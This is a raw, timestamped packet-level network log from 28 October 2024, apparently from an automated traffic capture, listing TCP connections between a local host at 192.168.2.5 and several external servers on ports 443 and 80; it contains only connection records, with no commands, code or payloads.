                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.981786013 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.981801033 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.981807947 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.981839895 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.984637976 CET49857443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.984694004 CET4434985713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.984834909 CET49857443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.985116005 CET49857443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.985143900 CET4434985713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.985861063 CET443498424.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.985884905 CET443498424.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.985924006 CET49842443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.985934973 CET443498424.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.985959053 CET49842443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.985970020 CET49842443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.044229984 CET4434985013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.044502974 CET49850443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.044512987 CET4434985013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.046103954 CET4434985013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.046169996 CET49850443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.046533108 CET49850443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.046664000 CET4434985013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.046684027 CET49850443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.048495054 CET4434984913.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.048748016 CET49849443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.048767090 CET4434984913.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.049602032 CET4434984713.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.049803019 CET49847443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.049814939 CET4434984713.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.049925089 CET4434984913.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.049974918 CET49849443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.050331116 CET49849443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.050401926 CET4434984813.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.050411940 CET4434984913.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.050456047 CET49849443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.050587893 CET49848443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.050595999 CET4434984813.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.050662041 CET4434984713.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.050972939 CET49847443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.051095009 CET49847443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.051143885 CET4434984713.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.052037954 CET4434984813.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.052118063 CET49848443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.052414894 CET49848443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.052494049 CET4434984813.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.052510023 CET49848443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.053931952 CET4434985113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.054543018 CET49851443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.054563999 CET4434985113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.057832956 CET4434985113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.057913065 CET49851443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.058250904 CET49851443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.058331013 CET4434985113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.058394909 CET49851443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.058409929 CET4434985113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.065363884 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.065390110 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.065404892 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.065463066 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.087358952 CET4434985013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.091348886 CET4434984913.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.095330000 CET4434984813.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.098627090 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.098690033 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.098746061 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.098778963 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.098812103 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.098834038 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.098870993 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.098903894 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.098953962 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.098958969 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.099004030 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.100018978 CET49849443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.100020885 CET49850443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.100028992 CET4434985013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.100037098 CET4434984913.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.100044966 CET49848443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.100050926 CET4434984813.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.100054026 CET49847443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.100063086 CET49851443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.107078075 CET4434985313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.107517958 CET49853443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.107552052 CET4434985313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.108017921 CET49853443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.108028889 CET4434985313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.108499050 CET443498424.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.108525038 CET443498424.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.108573914 CET49842443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.108589888 CET443498424.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.108619928 CET49842443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.108642101 CET49842443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.145914078 CET49850443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.145919085 CET49849443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.146161079 CET49848443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.176626921 CET4434985013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.176671028 CET4434985013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.176814079 CET4434985013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.176872015 CET49850443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.178034067 CET49850443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.178044081 CET4434985013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.178633928 CET49858443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.178648949 CET4434985813.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.178729057 CET49858443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.180188894 CET49858443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.180202007 CET4434985813.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.182456970 CET4434984913.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.182482958 CET4434984913.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.182547092 CET49849443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.182560921 CET4434984913.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.182966948 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.183023930 CET4434984913.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.183027983 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.183029890 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.183048010 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.183079004 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.183094025 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.183151960 CET49849443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.183744907 CET49849443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.183757067 CET4434984913.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.200825930 CET4434984813.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.200875998 CET4434984813.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.201004982 CET4434984813.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.201081038 CET49848443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.203453064 CET49848443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.203459024 CET4434984813.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.215951920 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.216046095 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.216049910 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.216062069 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.216092110 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.216123104 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.216358900 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.216373920 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.216403008 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.216434002 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.229948997 CET443498424.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.229973078 CET443498424.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.230041027 CET49842443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.230073929 CET443498424.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.230103970 CET49842443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.230132103 CET49842443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.239051104 CET4434985313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.239128113 CET4434985313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.239298105 CET49853443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.239377022 CET49853443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.239377022 CET49853443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.239413977 CET4434985313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.239440918 CET4434985313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.242264032 CET49859443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.242279053 CET4434985913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.242583990 CET49859443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.242727041 CET49859443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.242742062 CET4434985913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.300373077 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.300400972 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.300416946 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.300441027 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.300461054 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.333223104 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.333276987 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.333321095 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.333337069 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.333378077 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.333395958 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.333564997 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.333614111 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.333616972 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.333631039 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.333651066 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.333672047 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.333775997 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.333817959 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.346756935 CET4434984713.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.346858978 CET4434984713.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.346927881 CET49847443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.346952915 CET4434984713.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.347017050 CET4434984713.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.347071886 CET49847443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.349102974 CET49847443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.349139929 CET4434984713.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.351622105 CET443498424.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.351646900 CET443498424.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.351730108 CET49842443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.351747036 CET443498424.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.351794958 CET49842443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.351816893 CET49842443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.399620056 CET4434985220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.400746107 CET49852443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.400769949 CET4434985220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.401638985 CET49852443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.401643991 CET4434985220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.401745081 CET49852443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.401758909 CET4434985220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.417205095 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.417283058 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.417294025 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.417342901 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.417402983 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.417443037 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.451843023 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.451857090 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.451867104 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.451903105 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.451939106 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.452115059 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.452127934 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.452138901 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.452174902 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.452198982 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.473443031 CET443498424.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.473465919 CET443498424.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.473540068 CET49842443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.473572016 CET443498424.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.473597050 CET49842443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.473648071 CET49842443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.509031057 CET4434985413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.509512901 CET49854443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.509538889 CET4434985413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.509982109 CET49854443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.509989977 CET4434985413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.524871111 CET4434985113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.524923086 CET4434985113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.525013924 CET49851443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.525032997 CET4434985113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.525068998 CET4434985113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.525140047 CET49851443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.526087999 CET49851443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.526103020 CET4434985113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.529227018 CET4434985513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.529865980 CET49855443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.529901028 CET4434985513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.530271053 CET49855443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.530282021 CET4434985513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.534528971 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.534609079 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.534701109 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.534713030 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.534754038 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.568264961 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.568320036 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.568572998 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.568588018 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.568602085 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.568627119 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.568664074 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.569705009 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.569761992 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.569839954 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.569852114 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.569904089 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.570122004 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:32.570168972 CET4979680192.168.2.577.83.175.105
